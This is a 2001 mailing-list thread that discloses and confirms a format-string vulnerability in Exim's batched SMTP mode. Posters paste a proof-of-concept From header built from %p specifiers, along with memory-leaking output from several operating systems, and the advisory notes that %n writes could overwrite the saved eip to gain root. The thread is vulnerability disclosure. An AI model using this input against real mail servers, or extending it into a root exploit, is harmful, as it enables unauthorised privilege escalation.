Also on FreeBSD...
bash-2.03$ exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p
.
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x80ce8c00x8054af90x80ce2380x80ce2380x80cf0800x28233db70x282528480xf0x00x80ce53c
Transaction started in line 0
Error detected in line 5
An error was detected while processing a file of BSMTP input.
The error message was:
550 Syntax error in 'From' header: domain missing or malformed: failing
address is:
@@0x80ce8c00x8054af90x80ce2380x80ce2380x80cf0800x28233db70x282528480xf0x00x80ce53c
The SMTP transaction started in line 0.
The error was detected in line 5.
0 previous messages were successfully processed.
The rest of the batch was abandoned.
bash-2.03$ uname -a
FreeBSD xxxxxxxxx 4.3-BETA FreeBSD 4.3-BETA #22: Mon Mar 19 23:33:46 SAST 2001 savage@xxxxxxxxxx:/usr/obj/usr/src/sys/GENOCIDE i386
On Thu, 7 Jun 2001, Chris Knipe wrote:
> Confirmed on RedHat 7.0, Exim 3.22...
>
> [root@alcazar /root]# exim -bS
> mail from:lez@lez
> rcpt to:hax0r@lez
> data
> From:@@%p%p%p%p%p%p%p%p%p%p
>
> .
> 550 Syntax error in 'From' header: domain missing or malformed: failing
> address is:
> @@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)
> Transaction started in line 0
> Error detected in line 5
> An error was detected while processing a file of BSMTP input.
> The error message was:
>
> 550 Syntax error in 'From' header: domain missing or malformed: failing
> address is:
> @@0x817da500x8178240(nil)(nil)(nil)(nil)0x817d83c0x817d810(nil)(nil)
>
> The SMTP transaction started in line 0.
> The error was detected in line 5.
> 0 previous messages were successfully processed.
> The rest of the batch was abandoned.
>
>
> On Thu, 7 Jun 2001, Tabor J. Wells wrote:
>
> > I'm unable to get my 3.22 systems on Solaris 2.6 x86 and 8 on Sparc to
> > exhibit this behavior, with the options Megyer stated were necessary. I
> > wonder if it's OS specific.
> >
> > Megyer,
> >
> > Perhaps you could provide a bit more detail. Which version of Exim? Which
> > OS and version? Also you could have approached the author (Philip Hazel)
> > or the exim-users list in general before going public.
> >
> > Thanks,
> >
> > Tabor
> >
> > On Wed, Jun 06, 2001 at 04:12:16PM +0200,
> > Tamas TEVESZ <ice@???> is thought to have said:
> >
> > > Exploitation:
> > > -------------
> > >
> > > Try this:
> > > ===8<======8<=======8<======
> > > lez:~$ /usr/sbin/exim -bS
> > > mail from:lez@lez
> > > rcpt to:hax0r@lez
> > > data
> > > From:@@%p%p%p%p%p%p%p%p%p%p
> > >
> > > .
> > > ===8<======8<=======8<=======
> > >
> > > Somewhere in the answers you should see:
> > > 550 Syntax error in 'From' header: domain missing or malformed: failing address is: @@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40
> > >
> > > If you change %p's to %s's, you get segfault. With carefully constructed thing, it's easy to overwrite saved eip with %n's, and get root out of this bug.
> > >
> > > No exploit yet, but after the many local format bug exploits it's not a big work to write one for a skilled man.
> > > --
> > > Megyer Laszlo (Lez)
> > > lez@???
> > > __________________________________________________
> > > Security-l maillist - Security-l@???
> > > http://sunserv.kfki.hu/mailman/listinfo/security-l
> > >
> > >
> > >
> > >
> > >
> > > --
> > > ## List details at http://www.exim.org/mailman/listinfo/exim-users Exim details at http://www.exim.org/ ##
> >
> >
>
>
--
Regards,
Chris Knipe
Vardus (PTY) Ltd.
Technical Administrator
